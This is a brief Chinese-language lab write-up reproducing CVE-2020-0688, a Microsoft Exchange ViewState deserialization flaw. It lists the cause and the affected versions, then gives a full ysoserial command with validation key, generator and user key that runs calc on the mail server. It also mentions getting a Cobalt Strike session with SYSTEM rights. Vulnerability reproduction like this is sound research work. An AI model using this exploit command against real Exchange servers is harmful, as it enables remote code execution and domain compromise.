0%

CVE-2020-0688

简介:

  • 漏洞编号: CVE-2020-0688

  • 漏洞成因:

    1
    Exchange Server在安装部署时未能创建应用唯一的加密密钥,导致Exchange Server在反序列化处理请求中的 *__VIEWSTATE* 数据触发远程代码执行。Exchange 是以SYSTEM权限启用的IIS,因此普通登录用户也可通过反序列化达到提权的目的,进而可以获取域管理的权限。
  • 影响范围:

    1
    2
    3
    4
    Microsoft Exchange Server 2010 Service Pack 3
    Microsoft Exchange Server 2013
    Microsoft Exchange Server 2016
    Microsoft Exchange Server 2019

实验复现:

攻击机器: 192.168.195.15 x64win10

mail服务器机器: 192.168.195.77 x64win2k8r2

命令:

1
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="2a37496e-bc5c-4f78-b0be-8eea5d2e2c36" --islegacy  --isdebug

在邮服服务器上查看进程列表:

img0.jpg

最终上线cs,直接获取system权限。

img1.jpg

img2.jpg

img3.jpg

参考链接: